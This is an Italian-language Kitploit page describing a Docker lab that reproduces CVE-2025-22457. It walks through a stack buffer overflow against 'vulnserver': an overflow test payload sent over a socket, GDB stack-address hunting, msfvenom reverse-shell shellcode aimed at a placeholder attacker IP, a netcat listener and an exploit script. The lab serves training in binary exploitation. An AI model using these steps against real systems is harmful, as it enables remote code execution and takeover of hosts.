Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-22457-vulnserver-lab — Laboratorio pratico che riproduce CVE-2025-22457: configura container Docker attaccante/vittima, individua gli indirizzi dello stack con GDB e distribuisce un exploit reverse shell msfvenom. | Kitploit
Strumenti/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeCTFPenetration TestingApprendimento e FormazioneBinary ExploitationLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

Laboratorio pratico che riproduce CVE-2025-22457: configura container Docker attaccante/vittima, individua gli indirizzi dello stack con GDB e distribuisce un exploit reverse shell msfvenom.

Vedi Repository
11 giorno faNon ancora revisionato
Condividi

step 1 environment setting

Permessi & script di esecuzione

Se usi Windows puoi aprire wsl per eseguirlo

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

step 2: Trovare i valori dinamici (passaggio manuale)

Poiché gli indirizzi di memoria e gli IP sono dinamici in ambienti diversi, è necessario trovarli manualmente e aggiornare lo script exploit.py.

2.0 Per prima cosa avvia due docker attacker e un docker victim come preparazione successiva

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 Trovare stack_address (indirizzo di ritorno)

L'obiettivo di questo passaggio è trovare un indirizzo di stack stabile, in modo che il nostro payload possa saltare con precisione.

1. avvia GDB nel docker victim
root@kitploit:~
gdb ./vulnserver
2. imposta un breakpoint dopo la funzione strcpy
root@kitploit:~
(gdb) b strcpy
3. esegui il programma, vulnserver inizia ad ascoltare
root@kitploit:~
(gdb) run

Attivare il breakpoint: usa il docker attacker ed esegui il seguente comando per inviare un payload di test. Questo farà fermare GDB sul breakpoint. Nota: sostituisci <VICTIM_IP> con il Victim IP mostrato nel passaggio uno.

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

Trovare e registrare l'indirizzo: torna alla finestra del terminale dove si trova GDB, il programma dovrebbe essersi fermato. Esegui il seguente comando per esaminare lo stack:

root@kitploit:~
(gdb) x/200wx $esp

Nell'output, trova una zona composta da 0x43434343 (che rappresenta 'C'). Scegli un indirizzo a caso dal centro di questa zona (ad esempio 0xffffd580) e copialo. Questo è lo stack_address.

2.2 Aggiornare exploit.py e generare buf (Shellcode)

Aggiornare stack_address:

Con un editor di testo aggiorna stack_address in exploit.py con l'indirizzo appena copiato

Generare e aggiornare buf (Shellcode):

Nella shell del container attacker, esegui il comando msfvenom per generare lo shellcode. Nota: sostituisci <ATTACKER_IP> con l'Attacker IP mostrato nel passaggio uno.

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

Copia l'intero blocco buf = b""... prodotto da msfvenom e usalo per sostituire completamente la parte della variabile buf esistente nel file exploit.py.

step 3 : Eseguire l'attacco

Avviare il listener: in una delle finestre shell del container attacker, esegui il seguente comando per avviare il listener netcat.

root@kitploit:~
nc -lvnp 4444

Aprire la connessione sulla victim:

puoi usare i due metodi seguenti Metodo uno

root@kitploit:~
./vulnserver

Metodo due

root@kitploit:~
gdb ./vulnserver
gef➤  run

Eseguire lo script di attacco: esegui exploit.py aggiornato nel docker attacker. (Nota: aggiorna <victim_ip> con il victim ip mostrato nel passaggio uno)

root@kitploit:~
python3 exploit.py <victim_ip>

Verificare il risultato: torna alla finestra dove si trova il listener netcat. Se tutto è andato bene, puoi vedere una connessione stabilita e ottenere una shell interattiva. Puoi digitare comandi come whoami, ls -la per verificare.

step 4 : Pulire l'ambiente

Uscire da GDB e dal container:
root@kitploit:~
digita quit in GDB, poi digita exit nella shell del container.

Puoi eseguire i seguenti comandi per fermare e pulire tutti i container e le reti.

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
Scarica lo strumento